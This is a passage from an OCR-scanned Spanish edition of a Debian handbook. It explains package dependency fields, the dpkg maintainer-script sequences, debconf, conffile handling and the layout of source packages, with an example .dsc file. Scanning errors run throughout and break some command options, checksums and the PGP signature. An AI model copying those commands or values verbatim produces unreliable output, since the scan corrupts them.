Suggests  y  Enhances  rablemente  la  funcionalidad  ofrecida  por  el  paquete  pero  no  son  indispensables 
para  su  funcionamiento.  Las  dependencias  «sugeridas»,  de  importancia  secunda¬ 
ria,  indica  que  ciertos  paquetes  complementari'an  y  aumentarfan  su  utilidad  pero 
es  perfectamente  razonable  instalar  uno  sin  los  otros. 

Siempre  deberfa  instalar  los  paquetes  «recomendados»  a  menos  que  sepa  exac- 
tamente  que  no  los  necesita.  Por  el  contrario,  no  es  necesario  instalar  paquetes 
«sugeridos»  a  menos  que  sepa  porque  los  necesita. 

El  campo  Enhances  tambien  describe  una  sugerencia  pero  en  un  contexto  diferen- 
te.  Esta  ubicado  en  el  paquete  sugerido,  no  en  el  paquete  que  se  beneficia  de  la 
sugerencia.  Por  lo  tanto,  todos  los  agregados,  plugins  y  otras  extensiones  de  un 
programa  pueden  aparecer  en  la  lista  de  sugerencias  relacionadas  al  software.  Si 
bien  existe  desde  hace  varios  afios,  este  ultimo  campo  es  generalmente  ignorado 
por  programas  como  apt  o  synaptic.  Su  proposito  es  que  una  sugerencia  en  el 
campo  Enhances  aparezca  ante  el  usuario  ademas  de  las  sugerencias  tradicionales 
—  que  se  encuentran  en  el  campo  Suggests. 
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NORMA  DEBIAN  Las  «predependencias»,  listadas  en  el  campo  «Pre-Depends»  de  las  cabeceras  de 

Pre-Depends  un  Depends  un  Paquete,  completan  las  dependencias  normales;  la  sintaxis  es  identica.  Una  de- 

mas  exigentes  pendencia  normal  indica  que  el  paquete  en  cuestion  debe  ser  desempaquetado  y 
configurado  antes  de  la  configuracion  del  paquete  que  declara  la  dependencia.  Una 
predependencia  estipula  que  el  paquete  en  cuestion  debe  ser  desempaquetado  y 
configurado  antes  de  la  ejecucion  del  script  de  preinstalacion  del  paquete  que  de¬ 
clara  la  predependencia,  es  decir  antes  de  su  instalacion. 

Una  predependencia  es  muy  exigente  para  apt  porque  agrega  una  restriccion  estric- 
ta  en  el  orden  de  instalacion  de  los  paquetes.  Por  lo  tanto  se  intenta  evitar  predepen- 
dencias  a  menos  que  sea  absolutamente  necesario.  Es  recomendable  aun  consultar 
a  otros  desarrolladores  en  debian-devel@lists.debian.org  antes  de  agregar  una  pre¬ 
dependencia.  Generalmente  es  posible  encontrar  otra  solucion  para  evitarlo. 


Conflictos:  el  campo  Conflicts 

El  campo  Conflicts  indica  que  un  paquete  no  puede  instalarse  simultaneamente  con  otro.  La 
razon  mas  comun  es  que  ambos  paquetes  contienen  un  archivo  con  el  mismo  nombre,  proveen 
el  mismo  servicio  en  el  mismo  puerto  TCP  o  estorban  el  funcionamiento  del  otro. 

dp  kg  se  negara  a  instalar  un  paquete  si  genera  un  conflicto  con  un  paquete  ya  instalado,  ex- 
cepto  si  el  nuevo  paquete  especifica  que  «reemplazara»  al  paquete  instalado  en  cuyo  caso  dp  kg 
elegira  reemplazar  el  paquete  existente  con  el  nuevo.  apt  siempre  seguira  sus  instrucciones:  si 
desea  instalar  un  nuevo  paquete  ofrecera  automaticamente  desinstalar  el  paquete  que  genera 
problemas. 


Incompatibilidades:  el  campo  Breaks 

El  campo  Breaks  tiene  un  efecto  similar  al  del  campo  Conflicts  pero  con  un  significado  especial. 
Indica  que  la  instalacion  de  un  paquete  «rompera»  otro  paquete  (o  versiones  particulares  del 
mismo).  En  general,  esta  incompatibilidad  entre  dos  paquetes  es  temporal  y  la  relacion  Breaks 
se  refiere  especificamente  a  las  versiones  incompatibles. 

d  p  kg  se  negara  a  instalar  un  paquete  que  rompe  un  paquete  ya  instalado  y  a  pt  intentara  resolver 
el  problema  actualizando  a  una  nueva  version  el  paquete  que  se  romperia  (que  se  asume  estaria 
arreglado  y,  por  lo  tanto,  seria  compatible  nuevamente). 

Este  tipo  de  situaciones  pueden  ocurrir  en  casos  de  actualizaciones  que  no  sean  compatibles  con 
versiones  anteriores:  este  es  el  caso  si  una  nueva  version  ya  no  funciona  con  la  version  anterior 
y  causa  un  mal  funcionamiento  en  otros  programas  si  no  se  toman  medidas  especiales.  El  campo 
Breaks  previene  que  el  usuario  se  tope  con  estos  problemas. 


Elementos  provistos:  el  campo  Provides 

Este  campo  introduce  el  concepto  interesante  de  un  «paquete  virtual)).  Tiene  muchos  roles  pero 
hay  dos  particularmente  importantes.  El  primero  consiste  en  utilizar  un  paquete  virtual  para 
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asociar  un  servicio  generico  con  el  (el  paquete  «provee»  el  servicio).  El  segundo  indica  que  un 
paquete  reemplaza  completamente  a  otro  y,  para  esos  propositos,  tambien  puede  satisfacer  las 
dependencias  que  otros  satisfacen.  Es  posible,  entonces,  crear  un  paquete  substitute  sin  tener 
que  utilizar  el  mismo  nombre  de  paquete. 


VOCABULARIO  Es  esencial  distinguir  los  metapaquetes  de  los  paquetes  virtuales.  Los  primeros  son 
Metapaquete  y  paquete  paquetes  reales  (incluyendo  archivos  .deb)  cuyo  unico  proposito  es  expresar  de- 
virtual  pendencias. 

Los  paquetes  virtuales,  por  el  otro  lado,  no  existen  fisicamente;  solo  son  un  mo- 
do  de  identificar  paquetes  reales  basados  en  criterios  logicos  y  comunes  (servicios 
provistos,  compatibilidades  con  un  programa  estandar  o  un  paquete  preexistentes, 
etc.). 


Proveyendo  un  «servicio»  Discutamos  con  mas  detalles  el  primer  caso  con  un  ejemplo:  se 
dice  que  todos  los  servicios  de  correo,  como  postfix  o  sendmail  «proveen»  el  paquete  virtual  mail- 
transport-agent.  Por  lo  tanto,  cualquier  paquete  que  necesite  este  servicio  para  funcionar  (por 
ejemplo,  un  gestor  de  listas  de  correo  como  smartlist  o  sympa)  simplemente  indican  en  sus  de¬ 
pendencias  que  requieren  de  mail-transport-agent  en  lugar  de  especificar  una  lista  larga  y  aun 
incompleta  de  posibles  soluciones  (por  ejemplo  postfix  |  sendmail  |  exim4  |  ...j.Loque 
es  mas,  es  inutil  instalar  dos  servidores  de  correo  en  el  mismo  equipo,  por  lo  que  cada  uno  de 
estos  paquetes  declara  un  conflicto  con  el  paquete  virtual  mail-transport-agent.  Un  conflicto  de 
un  paquete  con  si  mismo  es  ignorado  por  el  sistema,  pero  esta  tecnica  prohibira  la  instalacion 
de  dos  servidores  de  correo  simultaneamente. 


NORMA  DEBIAN  Para  que  un  paquete  virtual  sea  util,  todos  deben  estar  de  acuerdo  en  su  nombre. 
Lista  de  paquetes  Porclue  eso  que  estan  estandarizados  en  la  Normativa  Debian.  Esta  lista  incluye, 
virtuales  entre  otros,  mail-transport-agent  para  servidores  de  correo,  c-compiler  para  com- 
piladores  del  lenguaje  de  programacion  C,  www-browser  para  navegadores  web, 
httpd  para  servidores  web,  ftp-server  para  servidores  FTP,  x-terminal-emulator 
para  emuladores  de  terminal  en  modo  grafico  (xterm)  y  x-window-manager  para 
gestores  de  ventanas. 

Puede  encontrar  la  lista  completa  en  la  web. 

•-  http : //www. debian . org/doc/packaging- manuals/ 
virtual- package- names- list . txt 


Intercambio  con  otro  paquete  El  campo  Provides  es  tambien  interesante  cuando  se  incluye 
el  contenido  del  paquete  en  un  paquete  mas  grande.  Por  ejemplo,  el  modulo  Perl  libdigest-md5- 
perl  era  un  modulo  opcional  en  Perl  5.6  y  fue  integrado  como  estandar  en  Perl  5.8  (y  versiones 
siguientes,  como  5.20  que  esta  presente  en  Jessie).  Como  tal,  el  paquete  perl  desde  su  version 
5.8  declara  Provides:libdigest-md5-perl  para  que  se  cumplan  las  dependencias  de  este  paquete 
si  el  usuario  tiene  Perl  5.8  (o  una  version  mas  reciente).  El  paquete  libdigest-md5-perl  en  si  fue 
eventualmente  eliminado  ya  que  no  tenia  proposito  cuando  las  versiones  antiguas  de  Perl  fueron 
retiradas. 
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Figura  5.1  Utilization  del  campo  Provides  para  no  romper  dependencias 


Esta  funcionalidad  es  muy  util  ya  que  nunca  es  posible  anticipar  los  caprichos  del  desarrollo  y 
es  necesario  que  sea  posible  adaptarse  a  cambios  de  nombre  y  otros  reemplazos  automaticos  de 
software  obsoleto. 


VOLVER  A  LOS  CIMIENTOS 

Perl,  un  lenguaje  de 
programacion 


Perl  (lenguaje  practico  de  extracion  y  reportes  —  «Practical  Extraction  and  Report 
Language*)  es  un  lenguaje  de  programacion  muy  popular.  Tiene  muchos  modulos 
listos  para  utilizar  que  cubren  un  vasto  espectro  de  aplicaciones  y  que  son  distribui- 
dos  por  los  servidores  CPAN  (red  exhaustiva  de  compendios  Perl  —  Comprehen¬ 
sive  Perl  Archive  Network*),  una  amplia  red  de  paquetes  Perl. 


http://www.perl.org/ 


http://www.cpan.org/ 

Dado  que  es  un  lenguaje  interpretado,  un  programa  escrito  en  Perl  no  requiere 
compilacion  antes  de  su  ejecucion.  Por  esto  se  los  llama  «scripts  Perl*. 


Limitaciones  anteriores  Los  paquetes  virtuales  solian  sufrir  algunas  limitaciones,  la  mas  im- 
portante  de  ellas  era  la  ausencia  de  un  ntimero  de  version.  Volviendo  al  ejemplo  anterior,  una 
dependencia  como  Depends:libdigest-md5-perl  (>=1.6)  nunca  sera  considerada  como  satisfecha 
aun  en  presencia  de  Perl  5.10  —  cuando  de  hecho  es  altamente  probable  que  este  satisfecha.  Sin 
conocimientos  de  esto  el  sistema  de  paquetes  selecciona  la  opcion  menos  riesgosa  y  asume  que 
las  versiones  no  coinciden. 

Esta  limitacion  ha  sido  levantada  dpkg  1.17.11  y  ya  no  es  mas  relevante  en  Jessie.  Los  paquetes 
pueden  asignar  una  una  version  a  los  paquetes  virtuales  que  proveen  con  una  dependencia  como 
Provides:libdigest-md5-perl  (=1.8). 
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Reemplazo  de  archivos:  el  campo  Replaces 

El  campo  Replaces  indica  que  el  paquete  contiene  archivos  que  tambien  estan  presentes  en  otro 
paquete,  pero  que  el  paquete  tiene  el  derecho  legftimo  de  reemplazarlo.  Sin  esta  especificacion, 
dpkg  fallara  indicando  que  no  puede  sobreescribir  los  archivos  de  otro  paquete  (tecnicamente 
es  posible  forzar  que  lo  haga  con  la  opcion  —force-overwrite,  pero  no  se  considera  una  opera- 
cion  estandar).  Esto  permite  identificar  problemas  potenciales  y  requiere  que  el  desarrollador 
estudie  el  hecho  antes  de  decidir  agregar  dicho  campo. 

El  uso  de  este  campo  esta  justificado  cuando  cambian  los  nombres  de  los  paquetes  o  cuando  un 
paquete  esta  incluido  en  otro.  Esto  sucede  cuando  el  desarrollador  decide  distribuir  los  archi¬ 
vos  de  otra  forma  entre  los  varios  paquetes  binarios  producidos  del  mismo  paquete  fuente:  un 
archivo  reemplazado  no  le  corresponde  al  paquete  antiguo,  solo  al  nuevo. 

Si  todos  los  archivos  de  un  paquete  instalado  fueron  reemplazados,  se  considera  que  se  elimino 
el  paquete.  Finalmente,  este  campo  incita  que  dpkg  elimie  los  paquetes  reemplazados  en  casos 
de  conflictos. 


YENDO  MAS  ALLA  Enel  ejemplo  anterior  de  apt  podemos  ver  la  presencia  de  un  campo  que  no  hemos 
El  campo  Tag  descripto  todavla,  el  campo  Tag.  Este  campo  no  describe  la  relacion  entre  paquetes 
sino  que  es  una  forma  simple  de  categorizar  un  paquete  en  una  taxonomla  tematica. 
Esta  clasificacion  de  paquetes  segun  varios  criterios  (tipos  de  interfaz,  lenguaje  de 
programacion,  dominio  de  la  aplicacion,  etc.)  ha  estado  disponible  en  Debian  por 
mucho  tiempo.  Sin  embargo,  no  todos  los  paquetes  tienen  etiquetas  («tag»)  preci- 
sas  y  no  esta  integrado  aun  en  todas  las  herramientas  de  Debian;  aptitude  mues- 
tra  estas  etiquetas  y  permite  utilizarlas  como  criterio  de  busqueda.  Para  aquellos 
que  evitan  los  criterios  de  busqueda  de  aptitude,  el  siguiente  sitio  web  le  permite 
navegar  por  la  base  de  datos  de  etiquetas: 

•-  http : //debtags . alioth . debian. org/ 


5.2.2.  Scripts  de  configuration 

Ademas  del  archivo  control,  el  compendio  cont rol . ta r .gz  de  cada  paquete  Debian  puede 
contener  una  cantidad  de  scripts  que  seran  ejecutados  por  dpkg  en  diferentes  etapas  del  pro- 
cesamiento  de  un  paquete.  La  Normativa  Debian  describe  los  casos  posibles  en  detalle,  especifi- 
cando  los  scripts  que  seran  llamados  y  los  argumentos  que  recibiran.  Estas  secuencias  pueden 
ser  complicadas  ya  que  si  falla  uno  de  los  scripts  dpkg  intentara  volver  a  un  estado  satisfactorio 
cancelando  la  instalacion  o  eliminacion  en  curso  (siempre  que  sea  posible). 

YENDO  MAS  ALLA  Todos  los  scripts  de  configuracion  para  los  paquetes  instalados  se  almacenan  en  el 
Base  de  datos  de  dpkg  directorio  /var/lib/dpkg/info/  en  forma  de  un  archivo  con  el  nombre  del  paque¬ 
te  como  prefijo.  Este  directorio  tambien  incluye  un  archivo  con  la  extension  .  list 
para  cada  paquete  que  contiene  una  lista  de  los  archivos  que  pertenecen  a  dicho 
paquete. 

El  archivo  /var/lib/dpkg/status  contiene  una  serie  de  bloques  de  datos  (en  el 
famoso  formato  de  cabeceras  de  correo,  RFC  2822)  que  describen  el  estado  de  cada 
paquete.  La  informacion  del  archivo  control  tambien  es  duplicada  alll. 
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En  general,  se  ejecuta  el  script  preinst  antes  de  la  instalacion  delpaquete,y  postinst  luego.  De 
la  misma  forma,  se  invoca  p rerm  antes  de  la  eliminacion  de  un  paquete  y  post  rm  luego.  Actua- 
lizar  un  paquete  es  equivalente  a  eliminar  la  version  anterior  e  instalar  la  nueva.  No  es  posible 
describir  en  detalle  todos  los  escenarios  posibles  aquf,  pero  discutiremos  los  dos  mas  comunes: 
instalacion/ actualizacion  y  eliminacion. 


PRECAUCION 

Nombres  simbolicos  de 
los  scripts 


Las  secuencias  descriptas  en  esta  seccion  llaman  scripts  de  configuracion  por  sus 
nombres  especificos,  como  old  -p  re  rm  o  new  -  postinst.  Elios  son,  respect  ivamente, 
el  script  prerm  en  la  version  antigua  del  paquete  (instalada  antes  de  la  actualiza¬ 
cion)  y  el  script  postinst  en  la  nueva  version  (instalada  en  la  actualizacion). 


SUGERENCIA  Manoj  Srivastava  realizo  estos  diagramas  explicando  como  dpkg  llama  a  estos 
Diagramas  de  estado  scripts  de  configuracion.  El  proyecto  Debian  Women  («Mujeres  Debian»)  tambien 
desarrollo  diagramas  similares;  mas  simples  de  entender  pero  menos  completos. 

https : //people . debian . org/~sri vast a/Main tainerScripts . html 
https : //wiki . debian . org/MaintainerScripts 


Instalacion  y  actualizacion 

Esto  es  lo  que  ocurre  durante  una  instalacion  (o  actualizacion): 

1.  En  una  actualizacion,  dpkg  ejecuta  old-prerm  upgrade  nueva-version. 

2.  En  una  actualizacion  dpkg  ejecutaluego  new-preinst  upgrade  antigua-version;  para 
una  primera  instalacion  ejecuta  new-preinst  install.  Tambien  puede  agregar  la  ver¬ 
sion  anterior  en  el  ultimo  parametro  si  el  paquete  ya  ha  sido  instalada  y  eliminada  desde 
entonces  (pero  no  purgada,  se  mantuvieron  los  archivos  de  configuracion). 

3.  Se  descomprimen  los  archivos  del  nuevo  paquete.  Si  un  archivo  ya  existe,  es  reemplazado 
pero  se  guarda  una  copia  de  respaldo  de  forma  temporal. 

4.  En  una  actualizacion,  dpkg  ejecuta  old-postrm  upgrade  nueva-version. 

5.  dpkg  actualiza  toda  su  informacion  interna  (lista  de  archivos,  scripts  de  configuracion, 
etc.)  y  elimina  los  respaldos  de  los  archivos  reemplazados.  Este  es  el  punto  sin  retorno: 
dpkg  ya  no  tiene  acceso  a  todos  los  elementos  necesarios  para  volver  al  estado  anterior. 

6.  dpkg  actualizara  los  archivos  de  configuracion,  pidiendole  al  usuario  que  decida  si  no  es 
capaz  de  administrar  esta  tarea  automaticamente.  Los  detalles  de  este  proceso  son  discu- 
tidos  en  la  Seccion  5.2.3,  «Sumas  de  verificacion  («checksum»),  lista  de  archivos  de  confi- 
guracion»  pagina  89. 

7.  Finalmente,  dpkg  configura  el  paquete  ejecutando  new-postinst  configure  ultima- 
version-  con  figurada. 
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Eliminacion  de  un  paquete 

Esto  es  lo  que  sucede  durante  la  eliminacion  de  un  paquete: 

1.  dpkg  ejecuta  prerm  remove. 

2.  dpkg  elimina  todos  los  archivos  del  paquete,  con  la  excepcion  de  los  archivos  de  configu¬ 
racion  y  scripts  de  configuracion. 

3.  dpkg  ejecuta  postrm  remove.  Se  eliminan  todos  los  scripts  de  configuracion  excepto 
post  rm.  Si  el  usuario  no  utilizo  la  opcion  «purgar»  («purge»),  el  proceso  termina  aqui. 

4.  Para  eliminar  completamente  un  paquete  (con  la  orden  dpkg  -  -purge  o  dpkg  -P),  los 
archivos  de  configuracion  tambien  son  eliminados  junto  con  una  cantidad  de  copias  (* . 
dpkg  -  tmp,  *  .dpkg  -  old,  *  .dpkg  -  new)  y  archivos  temporales;  luego  dpkg  ejecuta  postrm 
purge. 


VOCABULARIO 

Cuando  un  paquete  de  Debian  es  eliminado,  se  mantienen  los  archivos  de  configu¬ 

Purgar,  una  eliminacion 
completa 

racion  para  facilitar  una  posible  reinstalacion.  De  la  misma  forma,  se  mantienen 
normalmente  los  datos  generados  por  un  demonio  (como  el  contenido  de  un  servi- 
dor  de  directorio  LDAP  o  el  contenido  de  una  base  de  datos  de  un  servidor  SQL). 

Para  eliminar  todos  los  datos  asociados  con  un  paquete  es  necesario  «purgar»  el 
paquete  con  la  orden  dpkg  -P  paquete,  apt -get  remove  --purge  paquete  o 
aptitude  purge  paquete. 

Dada  la  naturaleza  definitiva  de  tal  eliminacion  de  datos,  un  purgado  no  se  debe 
tomar  a  la  ligera. 

Los  cuatro  scripts  que  aparecen  detallados  anteriormente  se  complementan  con  un  script 
config  provisto  por  los  paquetes  que  utilizan  debconf  para  adquirir  informacion  de  configu¬ 
racion  del  usuario.  Durante  la  instalacion  este  script  define  en  detalle  las  preguntas  realizadas 
por  debconf.  Se  graban  las  respuestas  en  la  base  de  datos  de  debconf  para  futuras  referencias. 
Generalmente  apt  ejecuta  el  script  antes  de  instalar  los  paquetes  uno  por  uno  para  agrupar  las 
preguntas  y  realizarlas  todas  al  usuario  al  comienzo  del  proceso.  Los  scripts  de  pre  y  postinsta- 
lacion  pueden  utilizar  esta  informacion  para  operar  segun  los  deseos  del  usuario. 


HERRAMIENTA  Se  creo  debconf  para  resolver  un  problema  recurrente  en  Debian.  Todos  los  paque- 
debconf  tes  Debian  que  no  pueden  funcionar  sin  un  minimo  de  configuracion  solian  hacer 
preguntas  ejecutando  echo  y  read  en  scripts  postinst  (y  otros  scripts  similares). 
Pero  esto  tambien  resultaba  que  durante  una  instalacion  o  actualizacion  grande  el 
usuario  debia  mantenerse  frente  al  equipo  para  responder  a  las  varias  preguntas 
que  podian  surgir  en  cualquier  momento.  Se  han  evitado  la  mayoria  de  todas  estas 
interacciones  manuales  gracias  a  la  herramienta  debconf. 

debconf  tiene  muchas  funcionalidades  interesantes:  requiere  que  el  desarrollador 
especifique  la  interaccion  con  el  usuario,  permite  localizacion  de  todas  las  cade- 
nas  mostradas  a  los  usuarios  (se  guardan  todas  las  traducciones  en  el  archivo 
templates  describiendo  las  interacciones),  tiene  diferentes  interfaces  para  presen- 
tar  las  preguntas  al  usuario  (modo  texto,  modo  grafico,  no  interactivo)  y  permite  la 
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creation  de  una  base  de  datos  central  de  respuestas  para  compartir  la  misma  con¬ 
figuration  entre  varios  equipos...  pero  la  mas  importante  es  que  ahora  es  posible 
presentar  al  usuario  todas  las  preguntas  juntas  antes  de  comenzar  un  largo  proce- 
so  de  instalacion  o  actualizacion.  Mientras  el  sistema  se  encarga  de  la  instalacion 
por  si  mismo,  el  usuario  puede  ocuparse  de  otras  tareas  sin  necesidad  de  quedarse 
mirando  la  pantalla  esperando  preguntas. 


5.2.3.  Sumas  de  verification  («checksum»),  lista  de  archivos  de  configuration 

Ademas  de  los  scripts  de  gestion  y  los  datos  de  control  mencionados  en  las  secciones  anteriores, 
el  compendio  cont  rol .  ta  r .  gz  en  un  paquete  Debian  puede  contener  otros  archivos  interesan- 
tes.  El  primero,  md5sums  contiene  una  lista  sumas  de  verification  MD5  de  todos  los  archivos  del 
paquete.  Su  principal  ventaja  es  que  permite  que  dpkg  -verify  (que  estudiaremos  en  la  Section 
14.3.3.1,  «Auditoria  de  paquetes  mediante  dpkg  -  -verify»  pagina  409)  chequee  si  estos  archi¬ 
vos  fueron  modificados  desde  su  instalacion.  Sepa  que  cuando  este  archivo  no  existe,  dpkg  lo 
generara  dinamicamente  en  el  momento  de  la  instalacion  (y  lo  almacenara  en  la  base  de  datos 
de  dpkg  al  igual  que  cualquier  otro  archivo  de  control). 

conffiles  enumera  los  archivos  del  paquete  que  tienen  que  administrarse  como  archivos  de 
configuration.  El  administrador  puede  modificar  los  archivos  de  configuration y  dpkg  intentara 
preservar  estos  cambios  durante  la  actualizacion  de  un  paquete. 

De  hecho,  en  esta  situation,  dpkg  se  comporta  tan  inteligentemente  como  le  es  posible:  si  el 
archivo  de  configuration  estandar  no  fue  modificado  entre  dos  versiones,  no  hace  nada.  Si,  sin 
embargo,  el  archivo  cambio  intentara  actualizar  este  archivo.  Son  posibles  dos  casos:  o  bien 
el  administrador  no  modified  el  archivo,  en  cuyo  caso  dpkg  automaticamente  instalara  la  nue- 
va  version;  o  el  archivo  fue  modificado,  en  cuyo  caso  dpkg  le  preguntara  al  administrador  que 
version  desea  utilizar  (la  antigua  con  modificaciones  o  la  nueva  provista  con  el  paquete).  Para 
asistirlo  en  esta  decision  dpkg  ofrece  mostrar  las  diferencias  entre  las  dos  versiones  («dif  f »).  Si 
el  usuario  decide  mantener  la  version  anterior,  la  nueva  sera  almacenada  en  la  misma  ubicacion 
con  el  sufijo  .  dpkg  -  dist.  Si  el  usuario  selecciona  la  nueva  version,  se  mantiene  la  version  ante¬ 
rior  en  la  misma  ubicacion  con  el  sufijo  .dpkg  -  old.  Otra  action  posible  consiste  en  interrumpir 
momentaneamente  dpkg  para  editar  el  archivo  e  intentar  rehacer  las  modificaciones  relevantes 
(identificadas  previamente  con  dif  f). 


YENDO  MAS  ALLA 

Obligando  a  dpkg  a 
preguntar  sobre  los 
archivos  de  configuration 


La  opcion  -  -  force-  conf  ask  obliga  a  dpkg  a  mostrar  las  preguntas  sobre  archivos 
de  configuracion  aun  en  los  casos  en  los  que  no  serian  necesarias  normalmente.  Por 
lo  tanto,  al  reinstalar  un  paquete  con  esta  opcion  dpkg  preguntara  nuevamente  so¬ 
bre  todos  los  archivos  de  configuracion  modificados  por  el  administrador.  Esto  es 
muy  conveniente,  especialmente  para  reinstalar  el  archivo  de  configuracion  origi¬ 
nal  si  este  fue  borrado  y  no  posee  otra  copia  disponible:  una  reinstalacion  normal 
no  funcionara  porque  dpkg  considera  la  elimination  como  una  forma  legitima  de 
modification  del  archivo  por  lo  que  no  lo  instalara  nuevamente. 
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YENDO  MAS  ALLA 

Evitando  preguntas  sobre 
los  archivos  de 
configuracion 


dpkg  administra  la  actualization  de  los  archivos  de  configuracion  pero  interrum- 
pe  estas  operaciones  frecuentemente  mientras  trabaja  para  pedir  informacion  al 
administrador.  Esto  lo  hace  menos  placentero  para  aquellos  que  desean  ejecutar 
actualizaciones  de  forma  no  interactiva.  Es  por  esto  que  este  programa  ofrece  op- 
ciones  que  le  permiten  al  sistema  responder  automaticamente  segun  la  misma  logi- 
ca:  -  -  force- conf  old  mantiene  los  archivos  de  configuracion  anteriores;  -  -force- 
confnew  utilizara  la  nueva  version  del  archivo  (se  respetan  estas  opciones  aun  cuan- 
do  el  archivo  no  fue  modificado  por  el  administrador,  que  rara  vez  tienen  el  efecto 
deseado).  Agregar  la  opcion  -  -force-confdef  le  indica  a  dpkg  que  decida  por  su 
cuenta  cuando  sea  posible  (en  otras  palabras,  cuando  el  archivo  de  configuracion 
original  no  fue  modificado)  y  solo  utilice  -  -force-conf  new  o  -  -force-confold 
para  los  otros  casos. 


Estas  opciones  solo  son  validas  para  dpkg,  pero  la  mayor  parte  del  tiempo  el  admi¬ 
nistrador  trabajara  directamente  con  los  programas  aptitude  o  apt -get.  Es,  por 
lo  tanto,  necesario  saber  la  sintaxis  necesaria  para  indicar  las  opciones  a  pasar  a 
dpkg  (sus  opciones  son  muy  similares). 


#  apt  -o  DPkg: :options: :="--force-confdef"  -o  DPkg :: options 
*+■  : :="--force-confold"  full-upgrade 


Puede  almacenar  estas  opciones  directamente  en  la  configuracion  de  apt.  Para  esto, 
simplemente  escriba  la  siguiente  linea  en  el  archivo  /etc/apt/apt  .conf.  d/local: 

DPkg :: options  {  "--force-confdef";  "--force-confold";  } 


Incluir  esta  opcion  en  el  archivo  de  configuracion  singifica  que  tambien  sera  utili- 
zada  en  una  interfaz  grafica  como  aptitude. 


5.3.  Estructura  de  un  paquete  fuente 


5.3.1  Formato 


Un  paquete  fuente  generalmente  consiste  de  tres  archivos:  uno  .  dsc,  uno  .  o rig  .  ta  r .  gz  y  uno 
.debian  .tar  .gz  (o  .  dif  f  .gz).  Elios  permiten  la  creacion  de  paquetes  binarios  (.deb  descriptos 
anteriormente)  a  partir  de  los  archivos  de  codigo  fuente  del  programa,  escritos  en  un  lenguaje 
de  programacion. 

El  archivo  .dsc  («Debian  Source  Control»:  control  de  fuente  Debian)  es  un  archivo  de  texto  cor- 
to  que  contiene  una  cabecera  RFC  2822  (de  la  misma  forma  que  el  archivo  control  estudiado 
en  la  Seccion  5.2.1,  «Descripcion:  el  archivo  cont  rol»  pagina  80)  que  describe  el  paquete  fuente 
e  indica  que  otros  archivos  forman  parte  del  mismo.  Esta  firmado  por  su  encargado,  lo  que  ga- 
rantiza  su  autenticidad.  Revise  la  Seccion  6.5,  «Comprobaci6n  de  la  autenticidad  de  un  paquete» 
pagina  128  para  mas  detalles  sobre  este  tema. 
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Ejemplo  5.1  Un  archivo  .  dsc 


. BEGIN  PGP  SIGNED  MESSAGE . 

Hash:  SHA256 

Format:  3.0  (quilt) 

Source:  zim 
Binary:  zim 
Architecture:  all 
Version:  0.62-3 

Maintainer:  Emfox  Zhou  <emfox@debian . org> 

Uploaders:  Raphael  Hertzog  <hertzog@debian . org> 

Homepage:  http://zim-wiki.org 
Standards-Version :  3.9.6 

Vcs- Browser:  http : //anonscm . debian . org/gitweb/?p=collab-maint/zim .git 
Vcs-Git :  git : //anonscm. debian . org/collab-maint/zim .git 

Build-Depends :  debhelper  (>=  9),  xdg-utils,  python  (>=  2.6.6-3~),  libgtk2.0-0  (>= 
2.6),  python-gtk2,  python-xdg 
Package-List : 

zim  deb  xll  optional  arch=all 
Checksums-Shal: 

ad8del70826682323cl0195b65b9f 1243fd75637  1772246  zim_0 . 62 . orig . tar . gz 
a4f70d6f 7f b404022c9cc4870a4e62ea3ca08388  14768  zim  0 . 62-3 . debian . tar . xz 
Checksums-Sha256: 

19d62aebd2cla92d84d80720c6cldcdb779c39a2120468fed01b7f252511bdc2  1772246  zim  0.62. 

**■  orig . tar . gz 

f c2e827e83897d5e33f 152f 124802c46c3c01c5158b75a8275a27833f lf6f lde  14768  zim_0.62-3. 
debian  .tar. xz 

Files : 

43419efba07f7086168442e3d698287a  1772246  zim  0.62. orig. tar. gz 
725a69663a6c2961f07673ae541298e4  14768  zim_0. 62-3. debian. tar. xz 

. BEGIN  PGP  SIGNATURE . 

Version:  GnuPG  v2 

Comment:  Signed  by  Raphael  Hertzog 

iQEcBAEBCAAGBQJUR2jqAAoJEA0IHavrwpq5WFcH/RsdzCHcloXXxHitU23hEqMj 
T6ok29MlUFDJDowMXW75jQlnT4WPUtvEGygkCHeo0/Pvj  EvBOsj  U8GQlX+N9ddSB 
aHfqfAYmVhADNGxrXQT5inZXUa8qGeeq2Sqf6YcWtsnuD56lDbvxkyf/XYopoIEl 
oltf l05z/AI+vYsW482YrCz0fxNAKAvkyuPhDebYI8j  nKWeAANoqmKpsNc/HYyvT 
+ZiA5o570iGd0KT6XGy3/FiF3dkHiRY8lXW7xdrlBbIgulwl9UmiUNwuxw0YbQ07 
edt  j iTJqOaFUA0xlzB/XGv5tHrlMj  P8naT+kfVoVHT0ox51CDbeu5D3DZY4imcY= 

=Wtoa 

. END  PGP  SIGNATURE . 

Note  que  el  paquete  fuente  tambien  tiene  dependencias  (Build-Depends)  completamente  distin- 
tas  de  aquellas  del  paquete  binario  ya  que  indican  las  herramientas  necesarias  para  compilar  el 
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software  en  cuestion  y  construir  su  paquete  binario. 


PRECAUCION  Es  importante  saber  que  no  hay  una  correspondence  necesaria  entre  el  nombre  de 

Espacios  de  nombres  un  PaclLlete  fuente  y  el  de  el  o  los  paquetes  binarios  que  genera.  Es  suficientemente 
distintos  facil  de  er|tender  si  sabe  que  cada  paquete  fuente  puede  generar  varios  paquetes 
binarios.  Es  por  esto  que  el  archivo  .dsc  tiene  los  campos  Source  y  Binary  para 
nombrar  explicitamente  el  paquete  fuente  y  almacenar  la  lista  de  paquetes  binarios 
que  genera,  respectivamente. 


CULTURA  Frecuentemente  un  paquete  fuente  (para  un  programa  dado)  puede  generar  varios 
Porque  dividir  en  varios  paquetes  binarios.  La  division  es  justificada  por  la  posibilidad  de  utilizar  (partes 
paquetes  de)  m'smo  en  varios  contextos.  Si  consideramos  una  biblioteca  compartida,  esta 
puede  ser  instalada  para  hacer  funcionar  una  aplicacion  (por  ejemplo,  iibc6)  o  para 
desarrollar  un  nuevo  programa  ( libc6-dev  seria  el  paquete  correcto).  Encontramos 
la  misma  logica  para  servicios  cliente/servidor  donde  deseamos  instalar  el  servidor 
en  una  maquina  y  la  parte  cliente  en  otras  (este  es  el  caso,  por  ejemplo,  de  openssh- 
server  y  openssh-dient). 

Tan  frecuentemente  tambien  se  provee  la  documentacion  en  un  paquete  dedicado: 
el  usuario  puede  instalarla  independientemente  del  software  y  puede  elegir  elimi- 
narla  en  cualquier  momento  para  ahorrar  espacio  en  disco.  Adicionalmente,  esto 
tambien  ahorra  espacio  en  disco  en  las  replicas  Debian  ya  que  todas  las  arquitectu- 
